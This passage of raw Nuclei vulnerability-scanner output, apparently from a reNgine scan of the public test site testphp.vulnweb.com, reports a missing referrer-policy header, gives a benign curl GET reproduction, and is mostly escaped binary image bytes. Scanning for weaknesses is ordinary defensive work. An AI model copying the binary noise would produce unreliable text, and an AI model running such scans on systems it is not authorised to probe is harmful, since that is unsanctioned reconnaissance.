L\\ufffd?W\\ufffd\\ufffd#\\ufffdVV\\ufffdf\\ufffddJ2P;\\ufffd\\ufffd;\\ufffdU\\n\\ufffdY\\ufffd\\ufffd\\ufffd:\\ufffdx\\u001d\\u003e6\\ufffd7\\ufffd-\\ufffd\\ufffdV2ށ,F\\ufffd7\\u000f\\ufffd\\ufffdأ}\\ufffdj#\\ufffdR;\\r\\\\\\ufffd\\u003e\\u0016]\\ufffd1\\ufffdp\\u003c\\ufffd\\ufffd\\u003e\\ufffdw\\ufffd\\ufffd1\\u000c\\u001f\\u0015\\ufffd\\ufffd4%\\u0000\\ufffd\\u001e\\ufffdV(\\ufffd\\ufffd捀A\\u0006\\ufffd\\ufffd{\\ufffd\\ufffd\\ufffd\\u001f\\ufffdP\\ufffd\\u000e\\u003eT\\ufffd\\u0015\\ufffdr\\u0002:\\ufffdb\\ufffd\\u00057`\\u001e\\t\\ufffd\\ufffd\\ufffd\\ufffdӡb\\ufffd\\ufffd#GUz\\ufffd\\u000e\\ufffdh\\n\\u0003m\\ufffd\\u0001\\ufffd@d\\ufffd\\u001b\\ufffd4\\u00016\\ufffd\\ufffdx\\ufffd\\u003cJ\\u0002\\ufffdc\\ufffd)a`\\u001a\\u0026\\ufffdw\\ufffd\\ufffd\\t\\u0001\\ufffd\\ufffd\\ufffd\\ufffd~ M\\ufffdn\\ufffdu\\ufffd\\ufffd\\ufffd\\ufffd3\\ufffd{\\u001a\\u0004\\ufffd{\\ufffd\\ufffd\\ufffdLq\\ufffd\\ufffd,\\ufffd\\ufffd\\\\\\ufffd\\t\\ufffd\\ufffdSI\\ufffdS{\\u001b\\ufffdG\\ufffd\\u000f\\ufffd\\ufffd\\ufffd|;!\\ufffd\\u0010\\ufffd\\ufffd\\ufffd\\u0026r.\\ufffd*\\ufffdT[\\u000e~m\\ufffdh_\\ufffd\\ufffdF\\ufffd\\u001d\\u0003\\ufffd\\ufffdVwM\\ufffd\\ufffd9\\ufffdI\\ufffd4\\ufffd\\ufffdƕ\\u0003!\\u003cw#m\\ufffd\\ufffd}\\ufffd\\ufffd\\u0016\\u000eO\\\"@\\ufffdzϞ\\ufffd\\u003cp#3\\ufffd\\u0000\\ufffd)=\\\\\\ufffd\\tP\\ufffd\\u0000\\ufffd\\ufffd[\\ufffd\\ufffd\\ufffd0\\ufffd!\\u000c\\ufffd\\ufffd#J״\\ufffd`S\\ufffd\\u003c|\\ufffd\\ufffdW\\ufffd1\\ufffdۜ\\ufffdH\\\",h*\\ufffd:S)}\\ufffd\\ufffdu\\ufffdb\\ufffdp\\ufffd\\ufffd\\ufffd\\ufffdD#\\u0001{\\ufffd\\u001a\\ufffd\\ufffdB\\ufffd\\u0006\\ufffd;\\ufffd\\ufffd4X\\ufffd\\u000b~M\\u0002k\\ufffd\\u000e\\ufffd?O\\ufffd\\ufffd\\ufffd6@BѻF\\ufffd\\u001c:\\ufffd5`\\ufffdD\\u001a\\ufffd\\ufffd\\ufffd\\u0000m\\u0005\\ufffd\\n\\ufffdH\\ufffd\\ufffd\\u0003w\\u0002\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdbj\\\\\\ufffd\\u0007\\ufffd\\ufffdt\\ufffd\\ufffd]\\ufffd\\ufffd\\ufffdx\\ufffdZ3HСD%\\ufffd\\ufffd\\ufffd\\ufffdT\\ufffd\\u0017B\\ufffd\\u001e\\ufffd\\ufffdv\\ufffd\\ufffd\\u0002\\ufffd\\ufffd[\\ufffdB\\u003ecc\\ufffdu\\ufffdP\\ufffd|\\ufffd\\ufffd\\ufffd˃d\\ufffd\\ufffd\\ufffd\\ufffd\\u0015\\ufffd\\ufffd\\ufffd\\ufffd\\u0016@;\\u001et\\ufffd\\ufffd\\ufffdI q\\ufffd\\ufffd\\ufffd\\u001c|\\ufffd\\ufffd\\ufffdJ\\ufffd\\ufffd\\ufffdCL\\ufffd\\ufffd1\\ufffd%@\\ufffdB\\ufffd\\ufffd\\u0008\\u0004\\ufffd5\\ufffd\\u001b\\u0017V\\u003c\\ufffd8\\ufffd\\ufffd#\\ufffdQ\\u001364\\ufffdE#Fɹ\\u0018\\ufffd\\ufffd\\ufffdk\\u000e\\u003c\\u0010H#\\ufffd$jΒޤ~\\ufffd\\ufffd\\ufffdS\\ufffd\\ufffd\\ufffd\\ufffd\\u0000\\ufffd\\ufffd\\ufffdZ\\ufffd:\\u000f\\u001d'5\\ufffd\\ufffd\\ufffd\\ufffdzs;\\ufffdӤ\\ufffd\\ufffd6\\ufffd\\r\\u0015$i\\ufffd⤠nE?q\\ufffd\\ufffd\\ufffdsK\\u0019h\\u0018\\ufffd( \\ufffd5d]_﫺fw\\ufffdL\\u0019\\u0000$\\ufffdk\\ufffd\\u0000G\\ufffd\\\\\\ufffd\\ufffdЧO\\ufffd\\ufffdm\\ufffd1\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u000e\\ufffd\\ufffdH\\ufffd\\ufffd\\ufffd\\n\\ufffd\\ufffdx\\u0004]\\ufffd}\\ufffd\\ufffd\\ufffd\\u003c\\ufffd\\ufffd\\ufffd$0ώ\\ufffd\\ufffd\\u0010\\ufffdB7314\\u0015Tr\\ufffd\\ufffd\\u0000\\ufffd\\ufffdc\\ufffdj\\ufffd\\ufffd\\ufffd\\u001aJ\\ufffd]A\\u0017tG\\ufffd\\u0007L\\ufffd\\ufffd\\ufffd\\ufffds\\ufffd嶰g\\ufffd8\\ufffd\\ufffdW\\u001f\\\"F\\ufffd\\\\\\t\\u0013\\ufffdS\\ufffd\\ufffd_c\\ufffd:\\ufffd\\ufffd\\ufffdGYy\\ufffd\\u0002z\\ufffd\\ufffd\\u0011;U\\ufffd\\ufffd\\ufffd\\u0001I\\ufffd\\ufffd]\\ufffdw\\ufffdگ\\ufffdd\\ufffdt\\ufffd\\ufffdXs\\u001d\\ufffdfW\\ufffd\\ufffd\\u001c\\ufffd\\ufffd\\ufffdx\\u0004X\\ufffd/\\ufffdW\\ufffd\\ufffd\\ufffd\\ufffdD\\u0005\\u0015\\ufffdC7\\ufffdU\\ufffd\\ufffd\\ufffd\\ufffdp+β]\\u001b\\ufffd\\u003cl\\ufffd}Rޒ\\u000b\\ufffdC]\\ufffd\\u0007\\ufffd\\ufffd\\ufffd\\ufffd@\\ufffdbN\\ufffd\\\"20e\\\"\\ufffd\\u0006\\ufffd\\u001a\\ufffd \\ufffd\\u0014\\ufffdT\\ufffd\\ufffd\\u0011\\ufffd\\u003e8\\ufffd\\u0008\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdQ\\ufffd\\ufffd\\u0010N\\ufffd;\\ufffd\\u001a\\ufffdb\\u0007ƺQgV\\ufffd\\ufffd^5\\ufffde\\ufffdB\\u0004\\ufffd\\ufffdȠ\\u001e5\\ufffd\\ufffd$\\ufffdԱ\\ufffd؟I\\ufffd\\u0012\\u0001\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdu\\ufffd_\\ufffd\\ufffd\\ufffd\\u001d\\ufffd\\ufffd~\\ufffd\\u0018Ѫ\\ufffd\\ufffdҜh\\ufffd\\ufffd\\ufffd1\\ufffdA\\u0000\\u0013\\ufffd\\u001bA\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd/\\ufffd\\ufffd\\ufffd\\ufffd_\\ufffdU\\ufffdcV\\ufffd\\ufffd\\u0007\\ufffdm_\\ufffd\\u00188S\\ufffd@\\ufffd\\ufffd\\ufffd\\ufffdSSUn\\u001b\\ufffd\\ufffdp\\u003eOβ\\ufffd\\u0001\\ufffd\\ufffd\\ufffd3\\ufffd\\u000fU\\ufffd\\ufffd\\ufffd\\ufffd\\u0008a\\ufffd\\\\\\ufffd\\u0000\\ufffdSSV\\u003eE\\ufffdJ\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd,u\\u0006\\ufffd\\ufffd\\ufffd:\\ufffd\\u001cO\\u0003\\ufffd\\u00048B\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdӜef}$\\ufffd\\u0006=e\\ufffd\\tf˗\\ufffd\\ufffdZ\\ufffdm\\ufffd\\ufffd\\ufffdε\\ufffd\\ufffd\\ufffd\\u001a\\ufffd\\ufffd)\\ufffd\\u0010\\\\1a\\u0002\\u001f\\u0012\\ufffd;k\\ufffd\\ufffd\\u0018\\ufffd\\ufffd\\u0008\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdՌX\\ufffdez\\ufffd\\u0004\\u0011u\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd=F\\u0006\\ufffd,\\u001d\\ufffd\\ufffd\\u0004\\ufffd菅sr'N\\ufffd,\\ufffd10亠\\ufffdTy\\ufffdۏmMM$y\\ufffd\\u0000='[oW\\ufffd\\ufffd3W\\ufffd\\ufffdT\\ufffd\\ufffd}'\\u001f+$ \\ufffd\\ufffd$( p\\ufffd{\\ufffd5\\ufffd\\ufffd\\ufffdښ\\ufffda\\ufffdr\\ufffd\\u0026\\u0018\\ufffdͫ\\ufffd󩩮\\u000ba\\u0013\\ufffd\\ufffd\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:42:33.937896037Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (X11; CrOS aarch64 13597.84.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36' 'http://testphp.vulnweb.com/pictures/4.jpg.tn'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"referrer-policy\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/pictures/7.jpg.tn\",\"path\":\"/pictures/7.jpg.tn\",\"matched-at\":\"http://testphp.vulnweb.com/pictures/7.jpg.tn\",\"request\":\"GET /pictures/7.jpg.tn HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/606.1.36 (KHTML, like Gecko) Version/9.1.2 Safari/606.1.36\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nContent-Length: 6458\\r\\nAccept-Ranges: bytes\\r\\nContent-Type: application/octet-stream\\r\\nDate: Wed, 13 Nov 2024 02:42:21 GMT\\r\\nEtag: \\\"4dca64a1-193a\\\"\\r\\nLast-Modified: Wed, 11 May 2011 10:27:45 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\ufffd\\ufffd\\ufffd\\ufffd\\u0000\\u0010JFIF\\u0000\\u0001\\u0001\\u0000\\u0000\\u0001\\u0000\\u0001\\u0000\\u0000\\ufffd\\ufffd\\u0000C\\u0000\\u0006\\u0004\\u0005\\u0006\\u0005\\u0004\\u0006\\u0006\\u0005\\u0006\\u0007\\u0007\\u0006\\u0008\\n\\u0010\\n\\n\\t\\t\\n\\u0014\\u000e\\u000f\\u000c\\u0010\\u0017\\u0014\\u0018\\u0018\\u0017\\u0014\\u0016\\u0016\\u001a\\u001d%\\u001f\\u001a\\u001b#\\u001c\\u0016\\u0016 , #\\u0026')*)\\u0019\\u001f-0-(0%()(\\ufffd\\ufffd\\u0000C\\u0001\\u0007\\u0007\\u0007\\n\\u0008\\n\\u0013\\n\\n\\u0013(\\u001a\\u0016\\u001a((((((((((((((((((((((((((((((((((((((((((((((((((\\ufffd\\ufffd\\u0000\\u0011\\u0008\\u0000d\\u0000\\ufffd\\u0003\\u0001\\\"\\u0000\\u0002\\u0011\\u0001\\u0003\\u0011\\u0001\\ufffd\\ufffd\\u0000\\u001c\\u0000\\u0000\\u0001\\u0005\\u0001\\u0001\\u0001\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0006\\u0000\\u0002\\u0004\\u0005\\u0007\\u0003\\u0001\\u0008\\ufffd\\ufffd\\u00006\\u0010\\u0000\\u0002\\u0001\\u0003\\u0003\\u0003\\u0002\\u0004\\u0005\\u0002\\u0007\\u0000\\u0003\\u0000\\u0000\\u0000\\u0001\\u0002\\u0003\\u0004\\u0005\\u0011\\u0000\\u0012!\\u0006\\u00131\\\"A\\u00072Qa\\u0014\\u0015#q\\ufffdB\\ufffd3CR\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0000\\u001b\\u0001\\u0000\\u0003\\u0000\\u0003\\u0001\\u0001\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0004\\u0005\\u0006\\u0001\\u0003\\u0007\\u0000\\u0002\\ufffd\\ufffd\\u00000\\u0011\\u0000\\u0001\\u0003\\u0003\\u0002\\u0004\\u0003\\u0008\\u0003\\u0001\\u0001\\u0000\\u0000\\u0000\\u0000\\u0000\\u0001\\u0000\\u0002\\u0003\\u0004\\u0005\\u0011!1\\u0012\\u0013AQaq\\ufffd\\u0006\\u0014\\\"2\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0015B\\ufffd\\ufffd\\u0000\\u000c\\u0003\\u0001\\u0000\\u0002\\u0011\\u0003\\u0011\\u0000?\\u0000\\ufffd\\ufffdI\\ufffdKMc\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd^\\ufffdܡ\\ufffdy!\\ufffd2\\ufffd\\ufffdw\\u0005c\\ufffdϓϑ\\ufffd\\u0019\\ufffd|x\\ufffd\\u001bT]K=$4n\\ufffd2\\ufffd\\u0014ʌb\\ufffd\\ufffd\\u000c\\ufffd\\u0018,1φ\\ufffdG\\ufffdQz~\\ufffd\\ufffd=t\\ufffdW\\ufffd\\u0002\\u001aF*\\ufffdO0uw\\ufffdG\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd|\\ufffd\\ufffdq\\ufffd7\\u003c6nI\\ufffd\\ufffd\\u003c\\ufffd\\ufffd\\u0012)]%?\\ufffd\\ufffd@\\ufffd\\u000ez\\ufffdq\\ufffd\\ufffd\\ufffd\\u0014\\u0003\\ufffds\\ufffdj~\\ufffd\\ufffdE \\ufffd\\ufffd\\ufffd\\ufffdμ\\ufffd\\ufffd\\u0017\\ufffdRׄ\\ufffdH\\ufffd7Y_$\\ufffd5\\ufffd\\ufffdT\\ufffd\\ufffd\\u0018Bʤ\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd}\\u001d\\ufffd\\u0026\\ufffd#R\\ufffd\\ufffd\\ufffdO\\ufffdd\\u003e\\ufffd\\ufffd y\\ufffd\\u001c\\ufffd\\ufffd\\u0007VR\\u001c\\ufffd\\u0001u\\ufffdv\\ufffd4*Q\\ufffd\\u0018\\ufffd\\ufffd \\ufffd\\ufffd\\ufffdަ\\u0003\\n\\u0014\\ufffd;\\ufffd\\ufffd\\ufffd\\u000c\\ufffdppt5\\\\\\ufffd\\ufffda\\ufffdl\\u0006\\ufffd\\ufffd:\\ufffdL\\ufffd\\ufffd\\u00059\\u0007$\\ufffd5ǧ\\ufffd3\\ufffd\\ufffd\\ufffd\\ufffdi\\ufffd\\ufffdvb`\\ufffdJ\\ufffdd\\ufffd\\u000f\\ufffd\\ufffdjNﶃ:B\\ufffdu\\ufffd)\\ufffd2\\u001fS;\\ufffd\\u0014\\ufffd\\\"\\ufffdİ\\ufffd\\u0007r\\ufffd\\u0004\\u0000K1\\u0003h\\ufffd\\u0003:.W\\ufffd\\ufffdY\\ufffd\\ufffd\\ufffd;\\ufffdw\\nCI9\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\tϝ3w\\ufffdH\\ufffd\\ufffdD\\ufffdp\\ufffdf\\ufffdy\\ufffd\\u000b\\rp\\ufffd\\ufffd\\ufffd\\u00171\\ufffd~\\u000e7x϶uWCw\\ufffdD\\ufffd\\u000b\\ufffd\\u0012E@\\ufffd\\u000e\\ufffd\\u0018\\u0012FAR}\\ufffd\\ufffd\\ufffd\\u000f\\u0007\\u0004\\u00105:V\\ufffd\\ufffd\\ufffdr\\ufffd\\ufffd\\ufffd\\ufffd0\\ufffdѐ7W\\u000c\\ufffd\\ufffd\\u0017n04\\ufffd o}r\\ufffdN\\u003e\\ufffd\\ufffd+\\rb\\ufffd':\\ufffd6Ll\\u0011\\ufffd\\ufffd8lx\\ufffdBt\\ufffd\\ufffd\\ufffdc+[\\ufffd\\ufffd\\ufffd\\ufffd\\u000fIt\\ufffdj\\ufffdY!\\ufffd\\ufffd!\\ufffd^\\ufffdqʑ\\ufffd,{\\ufffd疉q\\ufffd_\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdd\\u0014\\ufffd\\ufffdG$P\\ufffd\\ufffd\\n\\u000eԳ\\ufffd\\ufffd\\r\\ufffdR\\ufffd\\ufffd\\ufffd\\ufffd\\u003cg\\u001cx\\ufffd]\\ufffdH\\ufffd\\u001dT\\ufffdJ\\ufffdVشQ\\ufffd\\ufffdl\\ufffddd\\ufffd\\u0003$g*\\u0008\\u0004\\ufffd\\u0000\\ufffd:\\ufffdr\\ufffd\\u001bg\\ufffdM$\\ufffd\\u0004h\\ufffd\\ufffd\\ufffd\\ufffdV\\ufffdKm\\u0018\\u0000珮F\\ufffdE\\u001bc\\ufffd\\ufffd\\ufffd\\ufffd\\u0018\\ufffd󟲧\\ufffdϚ\\ufffd\\u001b \\ufffdS\\ufffd\\u0000v\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u000b\\ufffd\\u0012\\ufffd\\u0008c}\\ufffdPHq\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdKQ\\u001cK\\ufffdWD\\\\\\ufffd\\ufffd8\\ufffd\\ufffd\\u000f\\ufffdӬ\\ufffd\\ufffdR\\ufffd\\ufffdi\\ufffd#U+:Y\\ufffdJJ\\ufffd\\ufffd\\ufffd2B\\ufffd\\ufffd\\u000cW \\ufffd\\ufffdA\\ufffd\\u0000q\\ufffd\\u0019\\ufffd\\u0000Ρy\\ufffdi\\ufffd\\ufffd;^\\u0013\\ufffd4\\ufffd8\\u001f}}a|\\u0012\\ufffd\\\\Zu\\ufffd\\ufffd\\ufffd\\u0015\\u001eP\\ufffd\\ufffd\\ufffd±\\ufffd\\u0004\\ufffd\\u0006\\ufffd//_\\u000c\\ufffdOC\\ufffd\\ufffd\\u0014KP\\ufffdXa/\\ufffdj\\ufffd!F\\u0007k8;\\ufffd@%x$`\\ufffdRx\\ufffd_U\\n\\ufffd\\ufffdb\\ufffd\\ufffdI\\u0005E\\u001c\\ufffd\\ufffd%1\\ufffd8\\ufffd;\\ufffd\\ufffd\\ufffd\\ufffd`\\ufffd\\ufffd\\ufffd\\ufffd\\u0007:Ww\\ufffd\\ufffdL\\ufffd\\ufffdrF\\ufffdP{;8\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdu'\\ufffd\\ufffd\\ufffd\\\\::\\ufffdb\\u00163G\\ufffdB\\ufffd!;Ӎ\\ufffd\\u001caW\\ufffd\\ufffd\\ufffd\\ufffd\\u003c\\u000fa\\ufffd$\\ufffd`s\\ufffd\\ufffd\\ufffd+䦪Ji\\ufffd\\u0018\\u0012Aߌ+.\\u001d_\\ufffd\\ufffd\\u0005P\\ufffd\\ufffd]X\\u0001\\ufffd\\ufffd\\u00006\\ufffdZ\\ufffd8\\ufffd\\u001eK\\ufffd\\u0018D\\u0019c\\ufffd\\u0018\\u001a\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdk\\ufffd\\ufffd[o4O\\u0015nk[\\ufffd\\ufffd\\ufffd\\ufffd}ƚ\\ufffd}\\ufffd7u\\ufffdĴ3H\\ufffd\\ufffdM\\ufffd7q\\u0026\\ufffd\\ufffd*\\ufffd\\ufffd\\ufffd\\ufffdN\\u0007\\ufffd\\ufffdp\\ufffdա\\ufffdw\\ufffdq\\ufffd\\ufffd\\ufffd~\\ufffd\\u0001\\ufffd~\\ufffd\\ufffd\\ufffd=\\ufffd\\ufffdE\\ufffd锳\\ufffd|\\ufffd\\ufffdLnp\\ufffd\\\\3$\\u000e\\ufffd\\ufffd\\ufffd1\\ufffd\\ufffd\\ufffd\\ufffd\\n\\ufffd\\ufffd;\\ufffdB\\ufffd\\ufffd\\ufffd\\ufffd(b\\ufffdG\\ufffd8c\\ufffd\\u0001vg,Ac\\ufffd\\u0013$\\ufffd\\u0005\\ufffd\\u0000J^\\ufffd^=\\ufffd\\ufffd\\ufffd\\ufffdϝ\\nu+\\ufffdQG:\\u0019B\\u000c\\u001c\\ufffd#\\ufffd\\ufffd΄\\ufffd`q\\u0012\\ufffd\\ufffdM\\ufffd\\u0013[[\\ufffdC\\ufffdx\\ufffd]\\ufffd\\ufffd\\u00158\\ufffd4F:s\\u0013\\\"\\ufffd\\ufffd\\ufffdRRT\\ufffdy \\ufffd\\ufffd\\ufffd|\\ufffd\\ufffd\\ufffdR\\ufffd3\\ufffd\\ufffd\\u0002\\ufffd\\ufffdܮ}\\u0011=ʎ\\u0016\\ufffd\\ufffd\\ufffd(bhi`H\\ufffd\\u0000\\u0011\\u0000\\u0005\\\";\\u0011F\\ufffdI\\ufffd\\n\\ufffd?0b\\ufffd\\ufffd:z\\ufffd=L\\ufffd4ҁ\\ufffd\\u0008\\ufffd\\u0001G\\u0007\\ufffd\\u0000}\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u003c\\ufffd\\ufffd\\u0000\\ufffd\\u001c`t\\ufffd?\\ufffd8\\ufffdX\\u001bN\\ufffd$/\\ufffd[Vt\\ufffd\\u003c\\u001c\\ufffd\\ufffd\\ufffdimS\\ufffd@er\\ufffdC\\u000c\\u0011\\ufffd\\u000cu\\u0005\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdB\\ufffd\\ufffdv\\ufffdC\\ufffd8\\ufffd \\ufffd8\\ufffd \\ufffd\\ufffdD\\ufffd\\ufffduC\\ufffdZ\\ufffdH\\ufffds\\t\\ufffd\\ufffdϾ|\\u0018\\ufffd\\u003eO\\ufffd\\u0008\\u001e\\ufffd\\ufffd\\ufffd \\ufffd\\ufffd\\u0016\\ufffd\\u001d\\u001c\\ufffd!\\ufffd\\u003e(*\\ufffdVl\\ufffdPϲX\\ufffdgqHӘ\\ufffd]\\ufffd\\ufffd\\t\\u000c\\ufffd\\ufffd6L\\u001cn8q.\\u0015A\\u0018!\\ufffd\\ufffd\\ufffd\\u00005\\ufffd\\ufffd\\ufffd\\ufffd'\\ufffd\\ufffd\\ufffd\\u0013\\ufffd\\u0016\\u0013\\u0006\\u0014\\ufffd9`\\ufffd\\u0005\\u0008;9\\u0007$\\ufffd\\u0003\\ufffdhJ\\ufffd\\ufffdӳ\\ufffdI\\ufffdu=]\\u0015X\\u0002\\ufffd\\u000c\\ufffd\\u000b\\ufffd'\\ufffdT\\ufffd_\\u003c\\ufffd\\ufffd\\ufffd\\ufffd\\u0001l\\ufffd\\ufffd̴\\u00157\\u001b|\\ufffd!\\ufffdId\\ufffd\\u0015-\\u0018\\ufffd\\ufffdw+6_\\ufffd\\u000b\\u0000\\ufffd\\ufffd\\ufffd\\ufffd|\\ufffd\\ufffd\\ufffdjJ:\\ufffd\\ufffdr\\ufffd,\\u000c\\ufffd\\ufffd\\ufffdL\\u001d\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd5\\u0015%W\\r\\ufffd\\u0013\\ufffd\\ufffdp5$\\ufffd\\u0016\\ufffdiHऎ\\u0018c\\u0011\\\"q\\ufffd\\u000c\\u0000s\\ufffd\\u0000~\\ufffd\\u001f\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd{\\ufffd(\\n1\\ufffd\\ufffd7\\u001c}\\ufffd\\ufffd\\u0000mH\\ufffdީ\\ufffd\\u000f\\ufffd2f\\ufffdi=\\ufffd\\ufffdL\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffda\\ufffd\\ufffd\\ufffd2F\\ufffd\\u000c$esɩ\\ufffdyt\\ufffd\\u0007\\ufffd\\ufffd\\ufffd\\ufffdw\\u001d7\\ufffd\\ufffd\\u0003g\\ufffd\\ufffd':ނ\\ufffdLs\\ufffdUq\\t#`@ \\ufffd}KsƸK\\ufffd5\\ufffdj\\u0016\\ufffd\\ufffdi\\ufffd@\\ufffd].\\u0004sȒƵ\\u0012\\u000c\\ufffd\\ufffd\\ufffd퐟\\ufffdp\\ufffd\\ufffd\\u0004\\ufffd\\ufffd\\ufffd\\ufffdd\\u0012\\u0015\\ufffd\\ufffd*\\ufffdt\\ufffdU\\ufffdLf\\ufffda\\u0006A\\u0002\\u0017S\\u001b\\ufffd;\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u000c0q\\ufffd\\u0005\\u0000\\ufffdu\\ufffd\\ufffd\\ufffd_P6ᐰ#\\ufffd\\n\\ufffd\\ufffd\\u0011\\ufffd\\u0008\\ufffd\\ufffd\\u0013[)\\ufffdp\\ufffd\\ufffd\\ufffd\\ufffdKOz\\ufffd\\ufffdr\\ufffd\\ufffd\\u0006p\\ufffd$\\ufffd\\ufffd\\ufffdr\\ufffd\\ufffd[y\\ufffd\\ufffdM;\\u001ao\\ufffd4\\ufffd\\ufffd\\ufffd!f, /\\ufffdع^\\u0010\\ufffd`\\ufffd\\u0005\\u0001ƢuM/P\\ufffd\\ufffd%\\ufffd\\ufffd\\ufffdL\\ufffd\\ufffd1H\\ufffd\\ufffd\\ufffde\\ufffd5\\ufffd\\ufffd\\u0026с\\ufffd(]\\ufffd\\ufffd!G\\u0003R:\\ufffd\\u0014J\\t\\ufffd\\ufffd4\\ufffd\\ufffde\\ufffdy\\ufffd\\ufffd\\ufffd%\\ufffd\\u000e\\ufffd\\ufffd\\ufffd|g\\u0019\\ufffd\\u0001$\\ufffd~f\\ufffd=Uj\\ufffdu\\u0015\\ufffdJj\\ufffd\\ufffdAQG:\\ufffd-c\\ufffd\\ufffd\\u0000\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u000eq\\ufffd\\ufffd#\\ufffd\\ufffdˑ\\ufffd\\ufffd\\ufffd\\ufffd~r0s\\ufffd\\ufffd˷n\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdl\\ufffds1\\ufffd\\ufffd\\ufffdGIw\\ufffd\\u0012CW\\u0004\\ufffd\\ufffd\\ufffdv\\ufffds\\ufffdG\\u001c\\u00022\\u000e\\u0008\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdsQQ\\u000c\\ufffd\\ufffd\\u001dE-\\u003c2\\\"\\ufffd\\ufffd\\ufffd \\ufffdeV\\ufffd\\ufffdq\\ufffd\\ufffd9\\ufffd\\ufffdr\\u0018\\u0000\\ufffd\\ufffd\\ufffd\\ufffd0\\ufffdXk\\ufffd\\u0006\\ufffd\\ufffd\\ufffd\\ufffd\\u0014J\\ufffdu\\ufffd\\ufffd\\u000e\\ufffd\\ufffd\\n2\\ufffd\\u001d\\ufffd\\ufffd2.\\u0014r@\\u003cx\\ufffdk=MT߄\\u0012,P\\ufffd\\ufffd,-Q\\u001a\\ufffdr\\ufffd\\ufffd=L1\\ufffdp`s\\ufffd\\ufffd\\ufffdx\\ufffd=\\ufffdhk\\ufffd#9#ӧ\\ufffd\\n\\ufffdC\\ufffd'\\ufffdf\\ufffd\\u003e\\ufffdh\\ufffd\\ufffd%\\ufffd\\ufffd\\ufffd^mv\\ufffd\\ufffdK\\ufffd]R\\ufffd5=\\ufffd\\ufffd;\\u003e%œ\\ufffd8\\u001bO,7z\\ufffdg蹵%ud\\ufffd2=\\ufffdR:\\ufffdw\\ufffdD\\u0011\\ufffd\\u0013\\ufffd\\u0017n\\ufffd\\ufffd\\ufffd\\u00047\\u003c\\ufffd\\u000c\\ufffd\\u001b\\ufffdAƑ\\ufffd\\ufffdAq\\ufffd|=\\ufffd\\ufffd\\ufffd-p\\\\j\\u0016\\u0026\\ufffdU\\u0003d\\ufffd\\ufffd\\ufffd\\ufffdX\\ufffd0US\\u0019l`\\u0005*\\ufffd\\ufffdg\\u0015\\ufffd\\ufffd\\ufffdx\\ufffd\\ufffd!\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0014HY\\ufffd\\u0000\\ufffd\\ufffd9\\ufffd\\u000f\\ufffd\\ufffdog\\ufffdk\\ufffd6\\ufffd\\ufffd8;\\ufffd\\ufffd\\u0026\\ufffdVq\\ufffd#ܕ\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdz\\ufffd\\ufffdT\\ufffd9q\\u0018\\nN\\ufffdp\\u0007\\ufffdQ\\ufffd\\ufffd-\\u0018\\ufffd\\ufffd\\u001aeK\\ufffdB\